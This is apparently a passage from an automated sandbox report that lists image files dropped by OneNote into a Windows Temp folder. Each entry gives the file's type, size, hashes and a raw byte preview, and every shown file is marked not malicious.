                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):827
                                                                                                  Entropy (8bit):7.23139555596658
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                  MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                  SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                  SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                  SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{D37E640B-E397-4DEE-A38B-C1B724C6CD25}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{D3BB3D05-1563-49AA-B30C-4E9377D1D432}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Temp\{D40F4CF7-37EF-4384-AC50-61F2A9E0E1B9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Temp\{D484B603-47B7-4340-AB12-54A07652F48A}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Temp\{D5CE1D8F-28C6-425A-8107-B4DA6E89E1DD}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Temp\{D67797A2-079E-4F1D-ADF0-46F66CC14041}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{D8DAED23-0060-4082-9AC4-6942CDFFCD50}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Temp\{D90FEB28-A3E9-455F-AE4C-165EC389090F}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{D9458B66-C0A6-4388-BC64-23EFAF161A3E}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Temp\{D949B373-FD62-436F-85B1-14B00DC35F58}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Temp\{DBB636EB-B0CA-4061-AF9A-FA7250E9F311}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):242903
                                                                                                  Entropy (8bit):7.944495275553473
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                  MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                  SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                  SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                  SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                  C:\Users\user\AppData\Local\Temp\{DC6788C4-82D2-4DBF-98F2-151C010E9826}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{DE06E333-16B4-473F-9F9F-DEE2B381E8AD}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
